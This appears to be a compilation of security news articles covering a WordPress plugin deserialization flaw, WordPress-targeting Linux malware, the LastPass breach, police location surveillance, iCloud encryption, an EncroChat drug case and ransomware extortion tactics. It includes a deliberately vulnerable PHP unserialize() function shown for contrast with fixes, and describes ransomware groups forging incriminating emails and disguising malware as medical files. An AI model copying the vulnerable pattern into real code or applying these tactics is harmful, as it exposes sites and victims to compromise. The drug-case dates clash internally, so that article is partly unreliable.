WordPress Anti-Spam Plugin Vulnerability Affects Up To 60,000+ Sites

A vulnerability was discovered in the popular Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin.

The purpose of the plugin is to stop spam in comments, forms, and sign-up registrations. It can stop spam bots and has the ability for users to input IP addresses to block.

It is a required practice for any WordPress plugin or form that accepts user input to allow only the specific kinds of input it expects, such as text, images, or email addresses.

Unexpected inputs should be filtered out. That filtering process that keeps out unwanted inputs is called sanitization.

For example, a contact form should have a function that inspects what is submitted and blocks (sanitizes) anything that is not text.

The vulnerability discovered in the anti-spam plugin allowed base64-encoded user input to reach code that decodes it, which can then trigger a type of vulnerability called PHP Object Injection.

The description of the vulnerability published on the WPScan website describes the issue as:

“The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain…”

The classification of the vulnerability is Insecure Deserialization.

The non-profit Open Web Application Security Project (OWASP) describes the potential impact of these kinds of vulnerabilities as serious, which may or may not be the case specific to this vulnerability.
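The pattern the WPScan advisory describes, base64-decoded user input handed to `unserialize()`, is shown here beside two safer alternatives. This is an added illustration written for this digest, not code from the Stop Spammers plugin, and the `ss_challenge` field name and the two `restore_challenge_*` helpers are hypothetical; the small `ss_sanitize_text()` helper stands in for WordPress' own `sanitize_text_field()` so the script runs outside WordPress.

```php
<?php
// Added example: the unserialize() pattern from the advisory next to safer
// alternatives. Field and function names are assumptions, not the plugin's.

// VULNERABLE: base64-decoded user input goes straight into unserialize().
// If any loaded plugin or theme defines a class whose __wakeup()/__destruct()
// has side effects (a "gadget chain"), the sender chooses which object PHP
// builds, which is what "PHP Object Injection" means.
function restore_challenge_unsafe(string $encoded)
{
    return unserialize(base64_decode($encoded));
}

// SAFER: refuse to instantiate any class. With allowed_classes => false,
// unserialize() turns every object in the payload into __PHP_Incomplete_Class,
// so no constructor, __wakeup() or __destruct() of a real class ever runs.
function restore_challenge_no_objects(string $encoded)
{
    $raw = base64_decode($encoded, true); // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    return unserialize($raw, ['allowed_classes' => false]);
}

// SAFEST: do not round-trip user state through PHP serialization at all.
// JSON cannot carry objects with behaviour, and the decoded shape can be
// validated field by field, which is the "only allow expected input" rule
// from the article above.
function restore_challenge_json(string $encoded): ?array
{
    $raw = base64_decode($encoded, true);
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true, 8); // associative arrays, shallow depth
    if (!is_array($data)) {
        return null;
    }
    // Keep only the fields we expect and sanitize each one.
    return [
        'challenge' => ss_sanitize_text((string) ($data['challenge'] ?? '')),
        'attempts'  => max(0, (int) ($data['attempts'] ?? 0)),
    ];
}

// Hypothetical stand-in for WordPress' sanitize_text_field(): strip tags and
// control characters, trim, and bound the length.
function ss_sanitize_text(string $value): string
{
    $value = strip_tags($value);
    $value = preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    return substr(trim($value), 0, 64);
}

// Constructed inputs: a benign JSON blob and a serialized-object payload.
$benign  = base64_encode(json_encode(['challenge' => 'abc123', 'attempts' => 1]));
$payload = base64_encode('O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}');

var_dump(restore_challenge_json($benign));       // validated array
var_dump(restore_challenge_json($payload));      // null: not JSON, rejected
var_dump(restore_challenge_no_objects($payload)); // __PHP_Incomplete_Class, inert
```

The `allowed_classes` option exists since PHP 7.0; on older runtimes the only reliable fix is the JSON route. In either case, the input should also be validated before decoding (length limits, a strict base64 check) so that malformed data is dropped early rather than parsed.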

Source and more details: https://www.searchenginejournal.com/wordpress-anti-spam-plugin-vulnerability-affects-up-to-60000-sites

New Linux malware uses 30 plugin exploits to backdoor WordPress sites

A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript.

According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities.

The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

The targeted plugins and themes are the following:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Facebook Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

If the targeted website runs an outdated and vulnerable version of any of the above, the malware automatically fetches malicious JavaScript from its command and control (C2) server and injects the script into the website.

Infected pages act as redirectors to a location of the attacker’s choosing, so the scheme works best on abandoned sites.

These redirections may serve in phishing, malware distribution, and malvertising campaigns to help evade detection and blocking. That said, the operators of the auto-injector might be selling their services to other cybercriminals.

An updated version of the payload that Dr. Web observed in the wild also targets the following WordPress add-ons:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

The additional add-ons targeted by the new variant indicate that the backdoor is under active development.

Dr. Web also mentions that both variants contain functionality that is currently inactive, which would allow brute-forcing attacks against website administrator accounts.

Defending against this threat requires admins of WordPress websites to update the themes and plugins running on the site to the latest available versions, and to replace those that are no longer developed with alternatives that are still supported.

Using strong passwords and activating the two-factor authentication mechanism should help ensure protection against brute-force attacks.

Source: https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/

LastPass says hackers stole customers’ password vaults

It’s time to start changing your passwords

Password manager giant LastPass has confirmed that cybercriminals stole its customers’ encrypted password vaults, which store its customers’ passwords and other secrets, in a data breach earlier this year.

In an updated blog post on its disclosure, LastPass CEO Karim Toubba said the intruders took a copy of a backup of customer vault data by using cloud storage keys stolen from a LastPass employee. The cache of customer password vaults is stored in a “proprietary binary format” that contains both unencrypted and encrypted vault data, but technical and security details of this proprietary format weren’t specified. The unencrypted data includes vault-stored web addresses. It’s not clear how recent the stolen backups are.

LastPass said customers’ password vaults are encrypted and can only be unlocked with the customers’ master password, which is only known to the customer. But the company warned that the cybercriminals behind the intrusion “may attempt to use brute force to guess your master password and decrypt the copies of vault data they took.”

Toubba said that the cybercriminals also took vast reams of customer data, including names, email addresses, phone numbers and some billing information.

Password managers are overwhelmingly a good thing to use for storing your passwords, which should all be long, complex and unique to each site or service. But security incidents like this are a reminder that not all password managers are created equal and can be attacked, or compromised, in different ways. Given that everyone’s threat model is different, no one person will have the same requirements as the other.

In a rare shituation (not a typo) like this — which we spelled out in our parsing of LastPass’s data breach notice — if a bad actor has access to customers’ encrypted password vaults, “all they would need is a victim’s master password.” An exposed or compromised password vault is only as strong as the encryption — and the password — used to scramble it.

The best thing you can do as a LastPass customer is to change your current LastPass master password to a new and unique password (or passphrase) that is written down and kept in a safe place. This means that your current LastPass vault is secured.

If you think that your LastPass password vault could be compromised — such as if your master password is weak or you’ve used it elsewhere — you should begin changing the passwords stored in your LastPass vault. Start with the most critical accounts, such as your email accounts, your cell phone plan account, your bank accounts and your social media accounts, and work your way down the priority list.

The good news is that any account protected with two-factor authentication will make it far more difficult for an attacker to access your accounts without that second factor, such as a phone pop-up or a texted or emailed code. That’s why it’s important to secure those second-factor accounts first, like your email accounts and cell phone plan accounts.

Sources: https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/

https://arstechnica.com/information-technology/2022/12/lastpass-says-hackers-have-obtained-vault-data-and-a-wealth-of-customer-info/

https://thehackernews.com/2022/12/lastpass-admits-to-severe-data-breach.html

https://techcrunch.com/2022/12/22/lastpass-customer-password-vaults-stolen/

Tech tool offers police ‘mass surveillance on a budget’

By GARANCE BURKE and JASON DEAREN

September 2, 2022

Local law enforcement agencies from suburban Southern California to rural North Carolina have been using an obscure cellphone tracking tool, at times without search warrants, that gives them the power to follow people’s movements months back in time, according to public records and internal emails obtained by The Associated Press.

Police have used “Fog Reveal” to search hundreds of billions of records from 250 million mobile devices, and harnessed the data to create location analyses known among law enforcement as “patterns of life,” according to thousands of pages of records about the company.

Sold by Virginia-based Fog Data Science LLC, Fog Reveal has been used since at least 2018 in criminal investigations ranging from the murder of a nurse in Arkansas to tracing the movements of a potential participant in the Jan. 6 insurrection at the Capitol. The tool is rarely, if ever, mentioned in court records, something that defense attorneys say makes it harder for them to properly defend their clients in cases in which the technology was used.

The company was developed by two former high-ranking Department of Homeland Security officials under former President George W. Bush. It relies on advertising identification numbers, which Fog officials say are culled from popular cellphone apps such as Waze, Starbucks and hundreds of others that target ads based on a person’s movements and interests, according to police emails. That information is then sold to companies like Fog.

“It’s sort of a mass surveillance program on a budget,” said Bennett Cyphers, a special adviser at the Electronic Frontier Foundation, a digital privacy rights advocacy group.

The documents and emails were obtained by EFF through Freedom of Information Act requests. The group shared the files with The AP, which independently found that Fog sold its software in about 40 contracts to nearly two dozen agencies, according to GovSpend, a company that keeps tabs on government spending. The records and AP’s reporting provide the first public account of the extensive use of Fog Reveal by local police, according to analysts and legal experts who scrutinize such technologies.

Federal oversight of companies like Fog is an evolving legal landscape. On Monday, the Federal Trade Commission sued a data broker called Kochava that, like Fog, provides its clients with advertising IDs that authorities say can easily be used to find where a mobile device user lives, which violates rules the commission enforces. And there are bills before Congress now that, if passed, would regulate the industry.

“Local law enforcement is at the front lines of trafficking and missing persons cases, yet these departments are often behind in technology adoption,” Matthew Broderick, a Fog managing partner, said in an email. “We fill a gap for underfunded and understaffed departments.”

Because of the secrecy surrounding Fog, however, there are scant details about its use and most law enforcement agencies won’t discuss it, raising concerns among privacy advocates that it violates the Fourth Amendment to the U.S. Constitution, which protects against unreasonable search and seizure.

What distinguishes Fog Reveal from other cellphone location technologies used by police is that it follows the devices through their advertising IDs, unique numbers assigned to each device. These numbers do not contain the name of the phone’s user, but can be traced to homes and workplaces to help police establish pattern-of-life analyses.

“The capability that it had for bringing up just anybody in an area whether they were in public or at home seemed to me to be a very clear violation of the Fourth Amendment,” said Davin Hall, a former crime data analysis supervisor for the Greensboro, North Carolina, Police Department. “I just feel angry and betrayed and lied to.”

Hall resigned in late 2020 after months of voicing concerns about the department’s use of Fog to police attorneys and the city council.

While Greensboro officials acknowledged Fog’s use and initially defended it, the police department said it allowed its subscription to expire earlier this year because it didn’t “independently benefit investigations.”

But federal, state and local police agencies around the U.S. continue to use Fog with very little public accountability. Local police agencies have been enticed by Fog’s affordable price: It can start as low as $7,500 a year. And some departments that license it have shared access with other nearby law enforcement agencies, the emails show.

Police departments also like how quickly they can access detailed location information from Fog. Geofence warrants, which tap into GPS and other sources to track a device, are accessed by obtaining such data from companies, like Google or Apple. This requires police to obtain a warrant and ask the tech companies for the specific data they want, which can take days or weeks.

Using Fog’s data, which the company claims is anonymized, police can geofence an area or search by a specific device’s ad ID numbers, according to a user agreement obtained by AP. But, Fog maintains that “we have no way of linking signals back to a specific device or owner,” according to a sales representative who emailed the California Highway Patrol in 2018, after a lieutenant asked whether the tool could be legally used.

Despite such privacy assurances, the records show that law enforcement can use Fog’s data as a clue to find identifying information. “There is no (personal information) linked to the (ad ID),” wrote a Missouri official about Fog in 2019. “But if we are good at what we do, we should be able to figure out the owner.”

Fog’s Broderick said in an email that the company does not have access to people’s personal information, and draws from “commercially available data without restrictions to use,” from data brokers “that legitimately purchase data from apps in accordance with their legal agreements.” The company refused to share information about how many police agencies it works with.

“We are confident Law Enforcement has the responsible leadership, constraints, and political guidance at the municipal, state, and federal level to ensure that any law enforcement tool and method is appropriately used in accordance with the laws in their respective jurisdictions,” Broderick said in the email.

“Search warrants are not required for the use of the public data,” he added Thursday, saying that the data his product offers law enforcement is “lead data” and should not be used to establish probable cause.

Kevin Metcalf, a prosecutor in Washington County, Arkansas, said he has used Fog Reveal without a warrant, especially in “exigent circumstances.” In these cases, the law provides a warrant exemption when a crime-in-process endangers people or an officer.

Metcalf also leads the National Child Protection Task Force, a nonprofit that combats child exploitation and trafficking. Fog is listed on its website as a task force sponsor and a company executive chairs the nonprofit’s board. Metcalf said Fog has been invaluable to cracking missing children cases and homicides.

“We push the limits, but we do them in a way that we target the bad guys,” he said. “Time is of the essence in those situations. We can’t wait on the traditional search warrant route.”

Fog was used successfully in the murder case of 25-year-old nurse Sydney Sutherland, who had last been seen jogging near Newport, Arkansas, before she disappeared, Metcalf said.

Police had little evidence to go on when they found her phone in a ditch, so Metcalf said he shared his agency’s access to Fog with the U.S. Marshals Service to figure out which other devices had been nearby at the time she was killed. He said Fog helped lead authorities to arrest a farmer in Sutherland’s rape and murder in August 2020, but its use was not documented in court records reviewed by AP.

Cyphers, who led EFF’s public records work, said there hasn’t been any previous record of companies selling this kind of granular data directly to local law enforcement.

“We’re seeing counties with less than 100,000 people where the sheriff is using this extremely high tech, extremely invasive, secretive surveillance tool to chase down local crime,” Cyphers said.

One such customer is the sheriff’s office in rural Rockingham County, North Carolina, population 91,000 and just north of Greensboro, where Hall still lives. The county bought a one-year license for $9,000 last year and recently renewed it.

“Rockingham County is tiny in terms of population. It never ceases to amaze me how small agencies will scoop up tools that they just absolutely don’t need, and nobody needs this one,” Hall said.

Sheriff’s spokesman Lt. Kevin Suthard confirmed the department recently renewed its license but declined to offer specifics about the use of Fog Reveal or how the office protects individuals’ rights.

“Because it would then be less effective as criminals could be cognizant that we have the device and adjust their commission of the crimes accordingly. Make sense?” Suthard said.

Fog has aggressively marketed its tool to police, even beta testing it with law enforcement, records show. The Dallas Police Department bought a Fog license in February after getting a free trial and “seeing a demonstration and hearing of success stories from the company,” Senior Cpl. Melinda Gutierrez, a department spokeswoman, said in an email.

Fog’s tool is accessed through a web portal. Investigators can enter a crime scene’s coordinates into the database, which brings back search results showing a device’s Fog ID, which is based on its unique ad ID number.

Police can see which device IDs were found near the location of the crime. Detectives or other officers can also search the location for IDs going forward from the time of the crime and back at least 180 days, according to the company’s user license agreement.

The emails and Fog’s Broderick contend the tool can actually search back years, however. Emails from a Fog representative to Florida and California law enforcement agencies said the tool’s data stretched back as far as June 2017. On Thursday Broderick, who had previously refused to address the question, said it “only has a three year reach back.”

While the data does not directly identify who owns a device, the company often gives law enforcement information it needs to connect it to addresses and other clues that help detectives figure out people’s identities, according to company representatives’ emails.

It is unclear how Fog makes these connections, but a company it refers to as its “data partner” called Venntel, Inc. has access to an even greater trove of users’ mobile data.

Venntel is a large broker that has supplied location data to agencies such as Immigration and Customs Enforcement and the FBI. The Department of Homeland Security’s watchdog is auditing how the offices under its control have used commercial data. That comes after some Democratic lawmakers asked it to investigate U.S. Customs and Border Protection’s use of Venntel data to track people without a search warrant in 2020. The company also has faced congressional inquiries about privacy concerns tied to federal law enforcement agencies’ use of its data.

Venntel and Fog work closely together to aid police detectives during investigations, emails show. Their marketing brochures are nearly identical, too, and Venntel staff has recommended Fog to law enforcement, according to the emails. Venntel said “the confidential nature of our business relationships” prevented it from responding to AP’s specific questions, and Fog would not comment on the relationship.

While Fog says in its marketing materials that it collects data from thousands of apps, like Starbucks and Waze, companies are not always aware of who is using their data. Venntel and Fog can collect billions of data points filled with detailed information because many apps embed invisible tracking software that follows users’ behavior. This software also lets the apps sell customized ads that are targeted to a person’s current location. In turn, data brokers’ software can hoover up personal data that can be used for other purposes.

Prior to publication, Fog’s Broderick refused to say how the company got data from Starbucks and Waze. But on Thursday, he said he did not know how data aggregators collected the information Fog Reveal draws from, or the specific apps from which the data was drawn.

For their part, Starbucks and Waze denied any relationship to Fog. Starbucks said it had not given permission to its business partners to share customer information with Fog.

“Starbucks has not approved Ad ID data generated by our app to be used in this way by Fog Data Science LLC. In our review to date, we have no relationship with this company,” said Megan Adams, a Starbucks spokesperson.

“We have never had a relationship with Fog Data Science, have not worked with them in any capacity, and have not shared information with them,” a Waze spokesperson said.

___

Fog Data Science LLC is headquartered in a nondescript brick building in Leesburg, Virginia. It also has related entities in New Jersey, Ohio and Texas.

It was founded in 2016 by Robert Liscouski, who led the Department of Homeland Security’s National Cyber Security Division in the George W. Bush administration. His colleague, Broderick, is a former U.S. Marine brigadier general who ran DHS’ tech hub, the Homeland Security Operations Center, during Hurricane Katrina in 2005. A House bipartisan committee report cited Broderick among others for failing to coordinate a swift federal response to the deadly hurricane. Broderick resigned from DHS shortly thereafter.

In marketing materials, Fog also has touted its ability to offer police “predictive analytics,” a buzzword often used to describe high-tech policing tools that purport to predict crime hotspots. Liscouski and another Fog official have worked at companies focused on predictive analytics, machine learning and software platforms supporting artificial intelligence.

“It is capable of delivering both forensic and predictive analytics and near real-time insights on the daily movements of the people identified with those mobile devices,” reads an email announcing a Fog training last year for members of the National Fusion Center Association, which represents a network of intelligence-sharing partnerships created after the Sept. 11 attacks.

Fog’s Broderick said the company had not invested in predictive applications, and provided no details about any uses the tool had for predicting crime.

Despite privacy advocates’ concerns about warrantless surveillance, Fog Reveal has caught on with local and state police forces. It’s been used in a number of high-profile criminal cases, including one that was the subject of the television program “48 Hours.”

Source: Tech tool offers police ‘mass surveillance on a budget’ | AP News

Why You Should Enable Apple’s New Security Feature in iOS 16.2 Right Now

Apple just rolled out iOS 16.2, a software update that includes a key new feature called Advanced Data Protection for iCloud. That means you can finally enable end-to-end encryption for your iCloud backups so no one but you—not even Apple—can access your iCloud data.

The fact that iCloud backups haven’t offered the option of end-to-end encryption until now has long been a point of controversy. iCloud backups of the Messages app were of particular concern because Apple could still hand over certain types of data within the backups to law enforcement. In particular, although conversations in Messages (along with other more personal data types, like the data stored in the Health app) were end-to-end encrypted, backups of those conversations were not. That meant police could subpoena those backups and gain access to texts. A couple of years ago, rumors suggested that Apple had dropped a plan to encrypt backups after the FBI complained about it. But now that the feature is here, everyone should turn it on. Here’s why.

Encryption is a mathematical process that jumbles data in a way that makes it unreadable without a key. End-to-end encryption ensures that only you control that key. This protection allows for private communication between a sender and a receiver—in this case, you’re both—such that third parties can’t access the data. Once you enable Advanced Data Protection, not even Apple will have the key to decrypt your data—and therefore it will have no way to help you regain access if you lose it. End-to-end encryption is common in secure messaging apps like Signal, as well as in software that stores sensitive data, such as password managers.

Many people enable iCloud backups because their iPhone bothers them repeatedly to do so, and perhaps they haven’t thought through the implications. Prior to today, storing a complete backup of your device, including your private photos and files, on a server—where someone other than you has access to it—has meant entering a data-privacy minefield. Someone gaining access to that account, through a data breach or by other means, would have access to anything stored there. And the problem hasn’t been limited to iCloud: Startlingly few cloud storage companies, in fact, offer end-to-end encryption.

But now, if you own one or more Apple devices, you can make sure that your backups, photo libraries, and iCloud Drive files are end-to-end encrypted.

How to turn on Advanced Data Protection

Advanced Data Protection is rolling out as part of the iOS 16.2 over-the-air software update in the US today. Other parts of the world will receive Advanced Data Protection in early 2023. Follow these steps:

  1. Turn on two-factor authentication for your Apple ID if you haven’t done so already.
  2. Update all your Apple devices to iOS 16.2, iPadOS 16.2, macOS 13.1, tvOS 16.2, watchOS 9.2, or newer. If your devices are older and don’t support the latest versions of Apple’s operating systems, you’ll have to remove them from your Apple ID in order to enable Advanced Data Protection. That means you won’t be able to log into your Apple account on that older device, in which case, you should probably not enable Advanced Data Protection until you upgrade to a newer Apple device.
  3. On an iPhone or iPad, open Settings (or System Preferences on a Mac) > [Your name] > iCloud > Advanced Data Protection > Account Recovery. On this page you’ll see a choice of recovery methods. To use Advanced Data Protection, you must set up at least one of these two options (you can do both):
    • Designate a recovery contact, a trusted person from your contacts list who also owns an Apple device and whom you can easily reach out to in case you get locked out of your account. If you choose this method, you’ll send the recovery contact a message with a link that they will need to tap or click to accept. They’ll now have the key to help you unlock your account, but they won’t be able to unlock it on their own.
    • Set up a recovery key, a 28-character key that you can use to access your account in case you are locked out. Apple has no way to recover this key for you, so it’s important that you save it somewhere safe. If you choose this method, you’ll need to verify the key before you enable it, so write it down.
  4. Head back to Settings > [Your name] > iCloud > Advanced Data Protection, tap Turn on Advanced Data Protection, and then follow the on-screen prompts. Here, you need to confirm your recovery contact or enter your recovery key one more time, followed by your device’s passcode. If you have any older devices that cannot be updated, you can remove them from the list at this point.

Aside from not being able to ask Apple to help you access your data, if you regularly access data or files from iCloud.com, web access is disabled by default when Advanced Data Protection is enabled. That means you can’t access anything there—however, you can hop into Settings > [Your name] > iCloud and tap Access iCloud Data on the Web to temporarily turn on access when you need it.

Enabling the new security feature is relatively simple, though it’s important to note that if you choose the recovery key option, you must secure your encryption key and make sure to store it somewhere safe. If you choose a recovery contact, make sure to stay in touch with that person. Otherwise, if you lose your device, your data could be completely gone.

What data gets protected (and what doesn’t)

Until this update, Apple provided end-to-end encryption for some of the most sensitive data stored in iCloud backups by default, including passwords, health data, and payment information. If you don’t turn on Advanced Data Protection, here are the data categories that are end-to-end encrypted by default, according to Apple’s list:

  • Passwords and Keychain
  • Health data
  • Home data
  • Messages in iCloud (but not iCloud backups)
  • Payment information
  • Apple Card transactions
  • Apple Maps (details such as favorites and search history)
  • QuickType Keyboard learned vocabulary
  • Safari (details such as history, tab groups, and iCloud tabs)
  • Screen Time
  • Siri information (details such as settings and personalization)
  • Wi-Fi passwords
  • W1 and H1 Bluetooth keys
  • Memoji

When you turn on the feature, nine more data categories are end-to-end encrypted:

  • iCloud backup
  • iCloud Drive
  • Photos, including photos in a Shared Library, if everyone in the Shared Library has Advanced Data Protection enabled
  • Notes
  • Reminders
  • Safari Bookmarks
  • Siri Shortcuts
  • Voice Memos
  • Wallet passes

Some data stored in iCloud still isn’t end-to-end encrypted, notably iCloud Mail and some third-party data, because doing so would break certain functions. The affected categories are as follows:

  • iCloud Mail
  • Contacts
  • Calendars
  • Photos stored in Shared Albums and any file shared with “Anyone with a link”
  • Any document shared for iWork collaboration
  • Any third-party app data that doesn’t employ its own end-to-end encryption (though if the backups of those apps are stored in iCloud Backup, they will be end-to-end encrypted, and if an app stores data in iCloud Drive, it should be end-to-end encrypted, as well)
  • Some metadata and usage information (details such as the names of your devices, the sizes of files, and more, which is notable because recent reports suggest that Apple isn’t entirely transparent about the data it collects)

If you use any collaboration features for Files or Notes, end-to-end encryption is enabled only when you and all other parties have Advanced Data Protection enabled. So, if you are collaborating through a shared Notes or Reminder item and want that data secured with end-to-end encryption, make certain your collaborators enable the feature, too.

Setting up Advanced Data Protection is an important step, but it’s not the end of the story. In addition to the various steps everyone needs to take to secure themselves online, be sure to take a few fundamental steps to secure your phone, such as using a strong passcode.

Source: https://www.nytimes.com/wirecutter/reviews/how-to-set-up-apples-new-icloud-encryption-security-feature/

Operation Venetic: Pet dog and accidental selfies help convict international drugs traffickers

A drugs trafficker helped investigators smash his own organised crime group by sending a photograph of his dog on encrypted communications platform EncroChat showing his partner’s phone number on the animal’s tag.

Danny Brown, 55, operated on EncroChat under the handle ‘throwthedice’.

He sent an image of his pet, named ‘Bob’, to co-conspirator Stefan Baldauf, 62, as they worked on a plot to send 448 kilos of MDMA worth £45m to Australia.

National Crime Agency investigators zoomed in on the phone number and used it – among many other tactics in a painstaking investigation – to prove Brown was part of the conspiracy.

Bob was present when Brown was eventually arrested.

Brown and Baldauf also sent accidental selfies of themselves on EncroChat – giving investigators more proof they were involved in the plan, which saw the drugs hidden in the arm of an industrial digger and shipped to Australia.

The OCG members sent the 40-tonne Doosan digger down under on the pretence of selling it.

They organised an online auction to make the excavator’s arrival in Australia look legitimate. But they rigged it by agreeing a pre-arranged bid with the intended recipients.

The auction provided the OCG a nervous moment when other potential buyers registered their interest in the digger.

OCG member Leon Reilly, 50, messaged Brown on EncroChat: “There are six people watching it.”

Brown replied: “F***ing hell, that’s not good is it.”

Brown, Baldauf and Reilly were convicted in June at Kingston Crown Court of drugs trafficking with three other men.

Today, Brown was jailed for 26 years, Baldauf for 28 and Reilly for 24.

The trio and their conspirators plotted in late 2019 and early 2020 to send the drugs, which were 77.5% pure, to Australia where MDMA’s street value is much higher than in the UK.

EncroChat was taken down in 2020.

The NCA led Operation Venetic – the UK law enforcement response to the takedown – which provided investigators with messages offenders had sent thinking the platform was safe from global law enforcement attention.

EncroChat users’ real names did not appear on phone messages – instead, they all used a ‘handle’ which investigators needed to attribute to real world suspects.

In one message, Brown, of Kings Hall Road, Bromley, Kent, sent a photo to his crime group of his television which showed his reflection in it.

And Baldauf, of Midhurst Road, Ealing, London, sent a picture of a brass door sign with his face visible in the reflection.

The OCG bought the excavator, a Doosan DX420, for 75,000 Euros.

Reilly, who used a UK address of Tudor Way, Hillingdon, Uxbridge, but was from Dunbeacon in Bantry, Co Cork, Ireland, arranged for the digger to be moved from Leeds by his company ‘Mizen Equipment’.

The digger was safely housed in an industrial unit in Grays, Essex.

Accomplice Tony Borg, 44, of Southwark Path, Basildon, Essex, took delivery of the machine at an industrial unit in Grays, Essex, and worked on it.

Philip Lawson, 61, of Wraysbury Road, Staines-upon-Thames, designed the hide and arranged a welder to cut open an arm of the digger and seal the Class A behind a lead lining.

Lawson bought a powerful welding machine and arranged for a sign-making company to make some stickers to cover the markings once it had been repainted.

It is believed the drugs were hidden inside the digger on 19 December 2020.

In the days before and after, the OCG members’ Encro phones were in frequent contact with each other and also used the same cell sites at certain times.

Mizen Equipment paid a haulage firm £1,600 to move the digger to Southampton Docks and it took from 24 January to 13 March to arrive in Brisbane, Australia.

Australian Border Force officers x-rayed the digger, removed the drugs, sealed the arm and installed a tracker and listening device before letting it move onto its intended destination – an auction house in Sydney.

The digger was moved to a small site west of Sydney in May 2020 and Lawson forwarded the Australian OCG a drawn diagram of exactly where the drugs were hidden and how the digger should be opened.

On 18 May two men from the Australian OCG spent two days trying to find the drugs before realising something was wrong.

EncroChat messages show the six UK men launched their own investigation and held meetings to find out who had stolen the drugs.

On 15 June 2020 Brown and Baldauf were arrested together in Putney, south west London. Brown was in possession of his Encro phone.

In Baldauf’s car was an iPhone with messages on it showing that he told people his Encro handle was ‘Boldmove’.

After being charged, the offenders repeatedly tried to get the case kicked out of court arguing the EncroChat evidence was inadmissible.

They were convicted by a jury.

Lawson was sentenced to 23 years; Murray to 24; and Borg to 15.

Gordon Meilack, 63, of Kingsway, Camberley, Surrey and Piotr Malinowski, 39, of De’Arn Gardens, Mitcham, London, were cleared of involvement in the conspiracy.

Two men were charged with offences relating to the Australian conspiracy following work between the NCA and Australian Federal Police. They are in the Australian judicial system.

Chris Hill, NCA operations manager, said: “These men thought they were safe on EncroChat but my officers did a superb and painstaking job of building the evidence against them through a mixture of traditional and modern detective skills.

“Brown and Baldauf’s accidental selfies and the photo of Bob the dog were the cherry on the cake in proving who was operating those handles.

“But the OCG went to enormous lengths, even rigging an auction, in a bid to transfer the drugs to Australian conspirators.

“The NCA works with partners at home and abroad to protect the public from the dangers of Class A drugs which wreak so much misery on communities in the UK.”

Source: https://www.nationalcrimeagency.gov.uk/news/operation-venetic-pet-dog-and-accidental-selfies-help-convict-international-drugs-traffickers

New Ransom Payment Schemes Target Executives, Telemedicine

Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

